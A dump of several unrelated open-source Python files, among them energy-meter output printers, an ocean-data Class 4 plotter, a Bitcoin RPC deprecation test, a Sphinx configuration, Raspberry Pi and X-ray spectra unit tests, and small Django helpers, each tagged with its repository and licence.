all_bs = [data.pack_as_bytes(name, getattr(t, name))
for name in data.names]
# Convert bytes to hex and print them
print(date + ' ' + ' '.join(
''.join('{0:02x}'.format(b) for b in iterbytes(bs))
for bs in all_bs))
class CSVPrinter(BasePrinter):
"""Prints data separated by a semicolon."""
def __init__(self, filename, separator=','):
self.separator = separator
self.printed_header = False
def print_data_header(self, t):
pass
def print_data(self, t, date):
if not self.printed_header:
print(self.separator.join(["timestamp"] + data.names))
self.printed_header = True
print('{1}{0}{2:5.1f}{0}{3:5.3f}{0}{4:5.3f}'
.format(self.separator, date, *t))
class EffectivePowerPrinter(BasePrinter):
"""
Prints the effective power in Watt, computed from voltage, current and the
power factor.
"""
def __init__(self, filename, separator=','):
self.separator = separator
def print_data_header(self, t):
pass
def print_data(self, t, date):
effective_power = t.voltage * t.current * t.power_factor
print('{1}{0}{2:.1f}'.format(self.separator, date, effective_power))
class ApparentPowerPrinter(BasePrinter):
"""Prints the calculated apparent power in VA."""
def __init__(self, filename, separator=','):
self.separator = separator
def print_data_header(self, t):
pass
def print_data(self, t, date):
apparent_power = t.voltage * t.current
print('{1}{0}{2:.1f}'.format(self.separator, date, apparent_power))
def round_up(n, multiple):
return int(math.ceil(1.0 * n / multiple) * multiple)
def print_namedtuple(t, formatter):
# Align at columns of four chars with at least two spaces as separator
name_width = round_up(max(len(name) for name in t._fields) + 2, 4)
format = '{0:' + str(name_width) + '}{1}'
for n, v in zip(t._fields, t):
# Print literals in displayable characters
if isinstance(v, bytes):
v = repr(v)
print(format.format(n, formatter.unitify(n, v)))
| Lekensteyn/el4000 | printers.py | Python | mit | 3,032 |
from django.core.urlresolvers import reverse
import django.http
import django.utils.simplejson as json
import functools
def make_url(request, reversible):
return request.build_absolute_uri(reverse(reversible))
def json_output(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
output = func(*args, **kwargs)
return django.http.HttpResponse(json.dumps(output),
content_type="application/json")
return wrapper
| ukch/online_sabacc | src/sabacc/api/viewhelpers.py | Python | gpl-3.0 | 494 |
from textwrap import wrap
import matplotlib.gridspec as gridspec
import matplotlib.pyplot as plt
import numpy as np
from flask import current_app
from flask_babel import gettext
from netCDF4 import Dataset, chartostring
import plotting.utils as utils
from plotting.plotter import Plotter
class Class4Plotter(Plotter):
def __init__(self, dataset_name: str, query: str, **kwargs):
self.plottype: str = "class4"
super(Class4Plotter, self).__init__(dataset_name, query, **kwargs)
def parse_query(self, query):
super(Class4Plotter, self).parse_query(query)
class4 = query.get("class4id")
if isinstance(class4, str):
class4 = class4.split(",")
self.class4 = np.array([c.rsplit("_", 1) for c in class4])
self.forecast = query.get("forecast")
self.climatology = query.get("climatology") is None or bool(
query.get("climatology")
)
self.error = query.get("error")
models = query.get("models")
if models is None:
models = []
self.models = models
def load_data(self):
indices = self.class4[:, 1].astype(int)
# Expecting specific class4 ID format: "class4_YYYMMDD_*.nc"
with Dataset(
current_app.config["CLASS4_FNAME_PATTERN"]
% (self.class4[0][0][7:11], self.class4[0][0]),
"r",
) as ds:
self.latitude = ds["latitude"][indices]
self.longitude = ds["longitude"][indices]
self.ids = list(map(str.strip, chartostring(ds["id"][indices])))
self.variables = list(map(str.strip, chartostring(ds["varname"][:])))
self.variable_units = list(map(str.strip, chartostring(ds["unitname"][:])))
forecast_data = []
observed_data = []
climatology_data = []
depths = []
for i in indices:
f_data = []
o_data = []
c_data = []
for j in range(0, len(self.variables)):
if self.forecast == "best":
f_data.append(ds["best_estimate"][i, j, :])
else:
f_data.append(ds["forecast"][i, j, int(self.forecast), :])
o_data.append(ds["observation"][i, j, :])
c_data.append(ds["climatology"][i, j, :])
forecast_data.append(np.ma.vstack(f_data))
observed_data.append(np.ma.vstack(o_data))
climatology_data.append(np.ma.vstack(c_data))
depths.append(ds["depth"][i, :])
self.depth_unit = ds["depth"].units
self.forecast_data = np.ma.array(forecast_data)
self.observed_data = np.ma.array(observed_data)
self.climatology_data = np.ma.array(climatology_data)
self.depths = np.ma.vstack(depths)
additional_model_data = []
additional_model_names = []
for m in self.models:
additional_model_names.append(m.split("_")[2])
# Expecting specific class4 ID format: "class4_YYYMMDD_*.nc"
with Dataset(
current_app.config["CLASS4_FNAME_PATTERN"] % (m[7:11], m), "r"
) as ds:
m_data = []
for i in indices:
data = []
for j in range(0, len(self.variables)):
data.append(ds["best_estimate"][i, j, :])
m_data.append(np.ma.vstack(data))
additional_model_data.append(np.ma.array(m_data))
self.additional_model_data = np.ma.array(additional_model_data)
self.additional_model_names = additional_model_names
def csv(self):
header = []
columns = ["ID", "Latitude", "Longitude", "Depth"]
for v in self.variables:
columns.extend(["%s Model" % v, "%s Observed" % v, "%s Climatology" % v])
data = []
for p_idx in range(0, len(self.ids)):
for idx in range(0, len(self.depths[p_idx])):
if self.observed_data[p_idx, :, idx].mask.all():
continue
entry = [
self.ids[p_idx],
"%0.4f" % self.latitude[p_idx],
"%0.4f" % self.longitude[p_idx],
"%0.1f" % self.depths[p_idx][idx],
]
for v in range(0, len(self.variables)):
entry.extend(
[
"%0.1f" % self.forecast_data[p_idx, v, idx],
"%0.1f" % self.observed_data[p_idx, v, idx],
"%0.1f" % self.climatology_data[p_idx, v, idx],
]
)
data.append(entry)
return super(Class4Plotter, self).csv(header, columns, data)
def plot(self):
figuresize = list(map(float, self.size.split("x")))
fig = plt.figure(figsize=figuresize, dpi=self.dpi)
width = len(self.variables)
if self.showmap:
width += 1 # Shift graphs to the right
gs = gridspec.GridSpec(2, width)
subplot = 0
# Render point location
if self.showmap:
plt.subplot(gs[0, subplot])
subplot += 1
utils.point_plot(np.array([self.latitude, self.longitude]))
if len(self.ids) > 1:
plt.legend(self.ids, loc="best")
plot_label = ""
giops_name = "GIOPS"
for idx, v in enumerate(self.variables):
plt.subplot(gs[:, subplot])
subplot += 1
handles = []
legend = []
for i in range(0, len(self.forecast_data)):
id_label = f"{self.ids[i]} " if len(self.ids) > 1 else ""
form = "-"
if self.observed_data[i, idx, :].count() < 3:
form = "o-"
if self.error in ["climatology", "observation"]:
if self.error == "climatology":
plot_label = gettext("Error wrt Climatology")
handles.append(
plt.plot(
self.observed_data[i, idx, :]
- self.climatology_data[i, idx, :],
self.depths[i],
form,
)
)
legend.append(f"{id_label} {gettext('Observed')}")
data = self.climatology_data
else:
plot_label = gettext("Error wrt Observation")
data = self.observed_data
handles.append(
plt.plot(
self.forecast_data[i, idx, :] - data[i, idx, :],
self.depths[i],
form,
)
)
legend.append(f"{id_label} {giops_name}")
for j, model_name in enumerate(self.additional_model_names):
handles.append(
plt.plot(
self.additional_model_data[j, i, idx, :]
- data[i, idx, :],
self.depths[i],
form,
)
)
legend.append(f"{id_label} {model_name}")
if self.error == "observation" and self.climatology:
handles.append(
plt.plot(
self.climatology_data[i, idx, :]
- self.observed_data[i, idx, :],
self.depths[i],
form,
)
)
legend.append(f"{id_label} {gettext('Climatology')}")
lim = np.abs(plt.xlim()).max()
plt.xlim([-lim, lim])
else:
plot_label = gettext("Class 4")
handles.append(
plt.plot(self.observed_data[i, idx, :], self.depths[i], form)
)
legend.append("%s %s" % (id_label, gettext("Observed")))
handles.append(
plt.plot(self.forecast_data[i, idx, :], self.depths[i], form)
)
legend.append(f"{id_label} {giops_name}")
for j, model_name in enumerate(self.additional_model_names):
handles.append(
plt.plot(
self.additional_model_data[j, i, idx, :],
self.depths[i],
form,
)
)
legend.append(f"{id_label} {model_name}")
if self.climatology:
handles.append(
plt.plot(
self.climatology_data[i, idx, :], self.depths[i], form
)
)
legend.append(f"{id_label} {gettext('Climatology')}")
plt.xlim([np.floor(plt.xlim()[0]), np.ceil(plt.xlim()[1])])
plt.gca().xaxis.set_label_position("top")
plt.gca().xaxis.set_ticks_position("top")
plt.xlabel(f"{v} ({utils.mathtext(self.variable_units[idx])})", fontsize=14)
plt.gca().invert_yaxis()
plt.ylabel(
gettext(f"Depth ({utils.mathtext(self.depth_unit)})"), fontsize=14
)
plt.grid(True)
leg = fig.legend(
[x[0] for x in handles],
legend,
loc="lower left",
bbox_to_anchor=(0.05, 0.05),
)
for legobj in leg.legendHandles:
legobj.set_linewidth(4.0)
names = [
"{} ({:0.2f}, {:0.2f})".format(*x)
for x in zip(self.ids, self.latitude, self.longitude)
]
wrapped_names = "\n".join(wrap(", ".join(names), 60))
plt.suptitle(f"{wrapped_names}\n{plot_label}", fontsize=15)
fig.tight_layout(pad=3, w_pad=4)
fig.subplots_adjust(top=0.85)
return super(Class4Plotter, self).plot(fig)
| DFO-Ocean-Navigator/Ocean-Data-Map-Project | plotting/class4.py | Python | gpl-3.0 | 10,590 |
#!/usr/bin/env python3
# Copyright (c) 2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test deprecation of RPC calls."""
from test_framework.test_framework import BitcoinTestFramework
class DeprecatedRpcTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 2
self.setup_clean_chain = True
self.extra_args = [[], ["-deprecatedrpc=validateaddress"]]
def run_test(self):
# This test should be used to verify correct behaviour of deprecated
# RPC methods with and without the -deprecatedrpc flags. For example:
#
# self.log.info("Make sure that -deprecatedrpc=createmultisig allows it to take addresses")
# assert_raises_rpc_error(-5, "Invalid public key", self.nodes[0].createmultisig, 1, [self.nodes[0].getnewaddress()])
# self.nodes[1].createmultisig(1, [self.nodes[1].getnewaddress()])
self.log.info("Test validateaddress deprecation")
SOME_ADDRESS = "mnvGjUy3NMj67yJ6gkK5o9e5RS33Z2Vqcu" # This is just some random address to pass as a parameter to validateaddress
dep_validate_address = self.nodes[0].validateaddress(SOME_ADDRESS)
assert "ismine" not in dep_validate_address
not_dep_val = self.nodes[1].validateaddress(SOME_ADDRESS)
assert "ismine" in not_dep_val
if __name__ == '__main__':
DeprecatedRpcTest().main()
| TheBlueMatt/bitcoin | test/functional/rpc_deprecated.py | Python | mit | 1,498 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Streamz documentation build configuration file, created by
# sphinx-quickstart on Wed Apr 12 18:41:31 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.mathjax',
'sphinx.ext.autosummary', 'sphinx.ext.extlinks', 'numpydoc']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'Streamz'
copyright = '2017, Matthew Rocklin'
author = 'Matthew Rocklin'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.0.1'
# The full version, including alpha/beta/rc tags.
release = '0.0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = []
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# Taken from docs.readthedocs.io:
# on_rtd is whether we are on readthedocs.io
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if not on_rtd: # only import and set the theme if we're building docs locally
import sphinx_rtd_theme
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
# html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'Streamzdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'Streamz.tex', 'Streamz Documentation',
'Matthew Rocklin', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'streamz', 'Streamz Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'Streamz', 'Streamz Documentation',
author, 'Streamz', 'One line description of project.',
'Miscellaneous'),
]
| jrmlhermitte/streamz | docs/source/conf.py | Python | bsd-3-clause | 5,154 |
"""
Tests of RPI-specific functionality (adapters and sensors).
"""
import asyncio
import unittest
import platform
from utils import ValueListSensor
from thingflow.base import Scheduler, SensorAsOutputThing
import thingflow.filters.map
from thingflow.filters.output import output
from thingflow.filters.combinators import passthrough
from utils import StopAfterN
MACHINE=platform.machine()
# Check whether the library for tsl2591 is installed.
# See https://github.com/maxlklaxl/python-tsl2591.git
try:
import tsl2591
TSL2591_INSTALLED=True
except:
TSL2591_INSTALLED=False
values = [
0,
1,
0,
1,
0,
1,
0
]
@unittest.skipUnless(MACHINE=="armv7l",
"Tests are specific to RaspberryPi")
class TestRpi(unittest.TestCase):
def test_gpio(self):
import thingflow.adapters.rpi.gpio
o = thingflow.adapters.rpi.gpio.GpioPinOut()
sensor_thing = SensorAsOutputThing(ValueListSensor("sensor-1", values))
sensor_thing.map(lambda evt: evt.val>0).passthrough(output()).connect(o)
s = Scheduler(asyncio.get_event_loop())
s.schedule_periodic(sensor_thing, 1.0)
s.run_forever()
@unittest.skipUnless(TSL2591_INSTALLED,
"TSL2591 sensor library not installed")
def test_tsl2591(self):
import thingflow.sensors.rpi.lux_sensor
sensor = SensorAsOutputThing(thingflow.sensors.rpi.lux_sensor.LuxSensor())
s = Scheduler(asyncio.get_event_loop())
stop = s.schedule_periodic(sensor, 1.0)
StopAfterN(sensor, stop, N=4).output()
s.run_forever()
if __name__ == '__main__':
unittest.main()
| mpi-sws-rse/thingflow-python | tests/test_rpi_adapters.py | Python | apache-2.0 | 1,694 |
"""tsbp URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.conf.urls.i18n import i18n_patterns
from django.contrib import admin
urlpatterns = i18n_patterns(
url(r'^admin/', admin.site.urls),
url('', include('social.apps.django_app.urls', namespace='social')),
) | lvercelli/pytsbp | tsbp/urls.py | Python | mit | 903 |
# HealthPotion.py Health potion item.
# Copyright Kevin Smith 2007.
#
# This file is part of HelHack.
#
# HelHack is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# Foobar is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import curses
from item.Item import Item
class HealthPotion(Item):
""" Health Potion
"""
def __init__(self, level):
self.blocking = False
self.carryable = False
self.glyph = "^"
self.colour = curses.COLOR_GREEN
self.level = level
| Kev/helhack | src/item/HealthPotion.py | Python | gpl-3.0 | 973 |
#!/usr/bin/env python
"""
.. py:currentmodule:: pymcxray.FileFormat.Results.test_XraySpectraRegionEmitted
.. moduleauthor:: Hendrix Demers <hendrix.demers@mail.mcgill.ca>
Tests for the module `XraySpectraRegionEmitted`.
"""
# Script information for the file.
__author__ = "Hendrix Demers (hendrix.demers@mail.mcgill.ca)"
__version__ = "0.1"
__date__ = "Feb 12, 2015"
__copyright__ = "Copyright (c) 2015 Hendrix Demers"
__license__ = "GPL 3"
# Standard library modules.
import unittest
import os.path
# Third party modules.
from nose import SkipTest
# Local modules.
# Project modules
from pymcxray.FileFormat.Results.XraySpectraRegionEmitted import XraySpectraRegionEmitted
# Globals and constants variables.
class TestXraySpectraRegionEmitted(unittest.TestCase):
"""
TestCase class for the module `XraySpectraRegionEmitted`.
"""
def setUp(self):
"""
Setup method.
"""
unittest.TestCase.setUp(self)
self.testDataPath = os.path.abspath(os.path.join(os.path.dirname(__file__), "../../../test_data/results"))
def tearDown(self):
"""
Teardown method.
"""
unittest.TestCase.tearDown(self)
def testSkeleton(self):
"""
First test to check if the testcase is working with the testing framework.
"""
#self.fail("Test if the testcase is working.")
def test_readRegion_0_30kV(self):
"""
Tests for method `readRegion_0`.
"""
filename = "SimulationNanoparticleAg_Au_SpectraPerElectron_1_srkeV_Region_0.csv"
filepath = os.path.join(self.testDataPath, filename)
if not os.path.isfile(filepath):
raise SkipTest
spectra = XraySpectraRegionEmitted()
spectra.path = self.testDataPath
spectra.basename = "SimulationNanoparticleAg_Au"
spectra.read()
self.assertEqual(6000, len(spectra.energies_keV))
self.assertEqual(6000, len(spectra.total_1_ekeVsr))
self.assertEqual(6000, len(spectra.characteristic_1_ekeVsr))
self.assertEqual(6000, len(spectra.bremsstrahlung_1_ekeVsr))
self.assertAlmostEqual(0.0025, spectra.energies_keV[0], 6)
self.assertAlmostEqual(29.9975, spectra.energies_keV[-1], 6)
self.assertAlmostEqual(0.0, spectra.total_1_ekeVsr[0], 12)
self.assertAlmostEqual(0.0, spectra.total_1_ekeVsr[-1], 12)
self.assertAlmostEqual(0.0, spectra.characteristic_1_ekeVsr[0], 12)
self.assertAlmostEqual(0.0, spectra.characteristic_1_ekeVsr[-1], 12)
self.assertAlmostEqual(0.0, spectra.bremsstrahlung_1_ekeVsr[0], 12)
self.assertAlmostEqual(0.0, spectra.bremsstrahlung_1_ekeVsr[-1], 12)
# 58 0.2825, 0.0, 0.0, 0.0
self.assertAlmostEqual(0.2825, spectra.energies_keV[56], 6)
self.assertAlmostEqual(0.0, spectra.total_1_ekeVsr[56], 12)
self.assertAlmostEqual(0.0, spectra.characteristic_1_ekeVsr[56], 12)
self.assertAlmostEqual(0.0, spectra.bremsstrahlung_1_ekeVsr[56], 12)
# 426 2.1225, 1.02186e-006, 8.96679e-007, 1.25179e-007
self.assertAlmostEqual(2.1225, spectra.energies_keV[424], 6)
self.assertAlmostEqual(0.0, spectra.total_1_ekeVsr[424], 12)
self.assertAlmostEqual(0.0, spectra.characteristic_1_ekeVsr[424], 12)
self.assertAlmostEqual(0.0, spectra.bremsstrahlung_1_ekeVsr[424], 12)
# 598 2.9825, 0.0319011, 0.031818, 8.31376e-005
self.assertAlmostEqual(2.9825, spectra.energies_keV[596], 6)
self.assertAlmostEqual(0.0, spectra.total_1_ekeVsr[596], 12)
self.assertAlmostEqual(0.0, spectra.characteristic_1_ekeVsr[596], 12)
self.assertAlmostEqual(0.0, spectra.bremsstrahlung_1_ekeVsr[596], 12)
#self.fail("Test if the testcase is working.")
def test_readRegion_1_30kV(self):
"""
Tests for method `readRegion_0`.
"""
filename = "SimulationNanoparticleAg_Au_SpectraPerElectron_1_srkeV_Region_1.csv"
filepath = os.path.join(self.testDataPath, filename)
if not os.path.isfile(filepath):
raise SkipTest
spectra = XraySpectraRegionEmitted()
spectra.path = self.testDataPath
spectra.basename = "SimulationNanoparticleAg_Au"
spectra.read(regionID=1)
self.assertEqual(6000, len(spectra.energies_keV))
self.assertEqual(6000, len(spectra.total_1_ekeVsr))
self.assertEqual(6000, len(spectra.characteristic_1_ekeVsr))
self.assertEqual(6000, len(spectra.bremsstrahlung_1_ekeVsr))
self.assertAlmostEqual(0.0025, spectra.energies_keV[0], 6)
self.assertAlmostEqual(29.9975, spectra.energies_keV[-1], 6)
self.assertAlmostEqual(1.29326e-008, spectra.total_1_ekeVsr[0], 12)
self.assertAlmostEqual(0.0, spectra.total_1_ekeVsr[-1], 12)
self.assertAlmostEqual(0.0, spectra.characteristic_1_ekeVsr[0], 12)
self.assertAlmostEqual(0.0, spectra.characteristic_1_ekeVsr[-1], 12)
self.assertAlmostEqual(1.29326e-008, spectra.bremsstrahlung_1_ekeVsr[0], 12)
self.assertAlmostEqual(0.0, spectra.bremsstrahlung_1_ekeVsr[-1], 12)
# 58 0.2825, 1.12879e-006, 0, 1.12879e-006
self.assertAlmostEqual(0.2825, spectra.energies_keV[56], 6)
self.assertAlmostEqual(1.12879e-006, spectra.total_1_ekeVsr[56], 12)
self.assertAlmostEqual(0.0, spectra.characteristic_1_ekeVsr[56], 12)
self.assertAlmostEqual(1.12879e-006, spectra.bremsstrahlung_1_ekeVsr[56], 12)
# 426 2.1225, 1.02186e-006, 8.96679e-007, 1.25179e-007
self.assertAlmostEqual(2.1225, spectra.energies_keV[424], 6)
self.assertAlmostEqual(1.02186e-006, spectra.total_1_ekeVsr[424], 12)
self.assertAlmostEqual(8.96679e-007, spectra.characteristic_1_ekeVsr[424], 12)
self.assertAlmostEqual(1.25179e-007, spectra.bremsstrahlung_1_ekeVsr[424], 12)
# 598 2.9825, 8.64716e-008, 0, 8.64716e-008
self.assertAlmostEqual(2.9825, spectra.energies_keV[596], 6)
self.assertAlmostEqual(8.64716e-008, spectra.total_1_ekeVsr[596], 12)
self.assertAlmostEqual(0.0, spectra.characteristic_1_ekeVsr[596], 12)
self.assertAlmostEqual(8.64716e-008, spectra.bremsstrahlung_1_ekeVsr[596], 12)
#self.fail("Test if the testcase is working.")
def test_readRegion_2_30kV(self):
"""
Tests for method `readRegion_0`.
"""
filename = "SimulationNanoparticleAg_Au_SpectraPerElectron_1_srkeV_Region_2.csv"
filepath = os.path.join(self.testDataPath, filename)
if not os.path.isfile(filepath):
raise SkipTest
spectra = XraySpectraRegionEmitted()
spectra.path = self.testDataPath
spectra.basename = "SimulationNanoparticleAg_Au"
spectra.read(regionID=2)
self.assertEqual(6000, len(spectra.energies_keV))
self.assertEqual(6000, len(spectra.total_1_ekeVsr))
self.assertEqual(6000, len(spectra.characteristic_1_ekeVsr))
self.assertEqual(6000, len(spectra.bremsstrahlung_1_ekeVsr))
self.assertAlmostEqual(0.0025, spectra.energies_keV[0], 6)
self.assertAlmostEqual(29.9975, spectra.energies_keV[-1], 6)
self.assertAlmostEqual(1.47934e-006, spectra.total_1_ekeVsr[0], 12)
self.assertAlmostEqual(0.0, spectra.total_1_ekeVsr[-1], 12)
self.assertAlmostEqual(0.0, spectra.characteristic_1_ekeVsr[0], 12)
self.assertAlmostEqual(0.0, spectra.characteristic_1_ekeVsr[-1], 12)
self.assertAlmostEqual(1.47934e-006, spectra.bremsstrahlung_1_ekeVsr[0], 12)
self.assertAlmostEqual(0.0, spectra.bremsstrahlung_1_ekeVsr[-1], 12)
# 0.2825, 0.000126745, 0, 0.000126745
self.assertAlmostEqual(0.2825, spectra.energies_keV[56], 6)
self.assertAlmostEqual(0.000126745, spectra.total_1_ekeVsr[56], 12)
self.assertAlmostEqual(0.0, spectra.characteristic_1_ekeVsr[56], 12)
self.assertAlmostEqual(0.000126745, spectra.bremsstrahlung_1_ekeVsr[56], 12)
# 426 2.1225, 8.165e-005, 0, 8.165e-005
self.assertAlmostEqual(2.1225, spectra.energies_keV[424], 6)
self.assertAlmostEqual(8.165e-005, spectra.total_1_ekeVsr[424], 12)
self.assertAlmostEqual(0.0, spectra.characteristic_1_ekeVsr[424], 12)
self.assertAlmostEqual(8.165e-005, spectra.bremsstrahlung_1_ekeVsr[424], 12)
# 598 2.9825, 0.0319011, 0.031818, 8.31376e-005
self.assertAlmostEqual(2.9825, spectra.energies_keV[596], 6)
self.assertAlmostEqual(0.0319011, spectra.total_1_ekeVsr[596], 12)
self.assertAlmostEqual(0.031818, spectra.characteristic_1_ekeVsr[596], 12)
self.assertAlmostEqual(8.31376e-005, spectra.bremsstrahlung_1_ekeVsr[596], 12)
#self.fail("Test if the testcase is working.")
def test_readRegion_1_200kV(self):
"""
Tests for method `readRegion_0`.
"""
filename = "SimulationNanoparticleAg_C_SpectraPerElectron_1_srkeV_Region_1.csv"
filepath = os.path.join(self.testDataPath, filename)
if not os.path.isfile(filepath):
raise SkipTest
spectra = XraySpectraRegionEmitted()
spectra.path = self.testDataPath
spectra.basename = "SimulationNanoparticleAg_C"
spectra.read(regionID=1)
self.assertEqual(40000, len(spectra.energies_keV))
self.assertEqual(40000, len(spectra.total_1_ekeVsr))
self.assertEqual(40000, len(spectra.characteristic_1_ekeVsr))
self.assertEqual(40000, len(spectra.bremsstrahlung_1_ekeVsr))
self.assertAlmostEqual(0.0025, spectra.energies_keV[0], 6)
self.assertAlmostEqual(199.998, spectra.energies_keV[-1], 6)
self.assertAlmostEqual(1.18553e-011, spectra.total_1_ekeVsr[0], 17)
self.assertAlmostEqual(0.0, spectra.total_1_ekeVsr[-1], 17)
self.assertAlmostEqual(0.0, spectra.characteristic_1_ekeVsr[0], 17)
self.assertAlmostEqual(0.0, spectra.characteristic_1_ekeVsr[-1], 17)
self.assertAlmostEqual(1.18553e-011, spectra.bremsstrahlung_1_ekeVsr[0], 17)
self.assertAlmostEqual(0.0, spectra.bremsstrahlung_1_ekeVsr[-1], 17)
# 58 0.2825, 2.11852e-005, 2.11838e-005, 1.33965e-009
self.assertAlmostEqual(0.2825, spectra.energies_keV[56], 6)
self.assertAlmostEqual(2.11852e-005, spectra.total_1_ekeVsr[56], 17)
self.assertAlmostEqual(2.11838e-005, spectra.characteristic_1_ekeVsr[56], 17)
self.assertAlmostEqual(1.33965e-009, spectra.bremsstrahlung_1_ekeVsr[56], 17)
# 426 2.1225, 7.34935e-009, 0, 7.34935e-009
self.assertAlmostEqual(2.1225, spectra.energies_keV[424], 6)
self.assertAlmostEqual(7.34935e-009, spectra.total_1_ekeVsr[424], 17)
self.assertAlmostEqual(0.0, spectra.characteristic_1_ekeVsr[424], 17)
self.assertAlmostEqual(7.34935e-009, spectra.bremsstrahlung_1_ekeVsr[424], 17)
# 598 2.9825, 7.2569e-009, 0, 7.2569e-009
self.assertAlmostEqual(2.9825, spectra.energies_keV[596], 6)
self.assertAlmostEqual(7.2569e-009, spectra.total_1_ekeVsr[596], 17)
self.assertAlmostEqual(0.0, spectra.characteristic_1_ekeVsr[596], 17)
self.assertAlmostEqual(7.2569e-009, spectra.bremsstrahlung_1_ekeVsr[596], 17)
#self.fail("Test if the testcase is working.")
def test__indice(self):
"""
Tests for method `_indice`.
"""
filename = "SimulationNanoparticleAg_Au_SpectraPerElectron_1_srkeV_Region_1.csv"
filepath = os.path.join(self.testDataPath, filename)
if not os.path.isfile(filepath):
raise SkipTest
spectra = XraySpectraRegionEmitted()
spectra.path = self.testDataPath
spectra.basename = "SimulationNanoparticleAg_Au"
spectra.read(regionID=1)
self.assertEqual(0, spectra._indice(0.0))
self.assertEqual(0, spectra._indice(0.0024))
self.assertEqual(0, spectra._indice(0.0025))
self.assertEqual(0, spectra._indice(0.0026))
self.assertEqual(0, spectra._indice(0.0049))
self.assertEqual(0, spectra._indice(0.0050))
self.assertEqual(1, spectra._indice(0.0051))
self.assertEqual(56, spectra._indice(0.282))
self.assertEqual(424, spectra._indice(2.123))
self.assertEqual(596, spectra._indice(2.984))
self.assertEqual(5999, spectra._indice(29.999))
self.assertEqual(5999, spectra._indice(30.0))
self.assertRaises(IndexError, spectra._indice, 31.0)
self.assertAlmostEqual(1.12879e-006, spectra.totalValue_1_ekeVsr(0.282), 12)
self.assertAlmostEqual(1.02186e-006, spectra.totalValue_1_ekeVsr(2.123), 12)
self.assertAlmostEqual(8.64716e-008, spectra.totalValue_1_ekeVsr(2.984), 12)
self.assertAlmostEqual(0.0, spectra.characteristicValue_1_ekeVsr(0.282), 12)
self.assertAlmostEqual(8.96679e-007, spectra.characteristicValue_1_ekeVsr(2.123), 12)
self.assertAlmostEqual(0.0, spectra.characteristicValue_1_ekeVsr(2.984), 12)
self.assertAlmostEqual(1.12879e-006, spectra.bremsstrahlungValue_1_ekeVsr(0.282), 12)
self.assertAlmostEqual(1.25179e-007, spectra.bremsstrahlungValue_1_ekeVsr(2.123), 12)
self.assertAlmostEqual(8.64716e-008, spectra.bremsstrahlungValue_1_ekeVsr(2.984), 12)
# 66.82
self.assertRaises(IndexError, spectra._indice, 66.82)
spectra = XraySpectraRegionEmitted()
spectra.path = self.testDataPath
spectra.basename = "SimulationNanoparticleAg_C"
spectra.read(regionID=1)
self.assertEqual(13363, spectra._indice(66.82))
